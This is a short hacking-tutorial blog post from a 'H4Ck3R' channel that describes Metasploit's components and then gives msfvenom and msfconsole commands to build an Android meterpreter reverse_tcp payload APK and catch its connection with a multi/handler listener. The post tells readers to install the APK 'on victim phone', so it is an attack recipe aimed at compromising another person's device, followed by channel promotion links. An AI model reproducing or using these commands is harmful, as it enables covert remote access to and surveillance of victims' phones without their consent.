What Is Metasploit And Payloads | By H4Ck3R
Introduction
Metasploit is mostly used exploitation framework . Metasploit Framework is set of open source tools that is used for network enummeration , vulnerability scanning , payload making , exploit etc.
Main Components
1. Auxiliary
It is a supporting module , such as scanner , fuzzers , crawlers etc found here.
2. Encoders
It is used to encode the exploit and payload to bypass signature based antivirus
3. Payloads
Payloads is just a code which is run in target system .
4. Exploits
It provides access to the target system .
Also Read : How To Install Metasploit In Termux
Payloads
We generally create two types of payloads :
- Using IP
- Using Portforwarding
Using IP
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R> /sdcard/payload.apk
Using this you will create a payload just install it on victim phone
NOTE : You need to connect hotspot with victim phone “Else it will not work”
Multi Handler
- cd metasploit-framework
- ./msfconsole
- use exploit/multi/handler
- set payload android/metrpreter/reverse_tcp
- set lhost 127.0.0.1
- set lport 4444
- exploit
I am Raj Aryan From ” H4Ck3R ” Channel .
IN OUR CHANNEL WE PROVIDE LATEST CONTENT RELATED TO IT , CYBER SECURITY , HACKING ETC , SO YOU CAN LEARN FROM IT , WE ALSO PROVIDE PDFS , WEBSITES . IF YOU ARE A BEGINNER , YOU CAN SUBSCRIBE MY YOUTUBE CHANNEL FOR MORE TUTORIALS .
My Website : ☣
Termux Fix
Requirements
▶Termux : https://bit.ly/31NgG3V
▶Hacker’s Keyboard : https://bit.ly/2PBz4a7
▶Mix Explorer : https://bit.ly/2PElnHk
▶Termux : https://bit.ly/31NgG3V
▶Hacker’s Keyboard : https://bit.ly/2PBz4a7
▶Mix Explorer : https://bit.ly/2PElnHk
JOIN US
Telegram Group 7k Members
Telegram Channel 1.1k Members
Instagram
Telegram Group 7k Members
Telegram Channel 1.1k Members
Instagram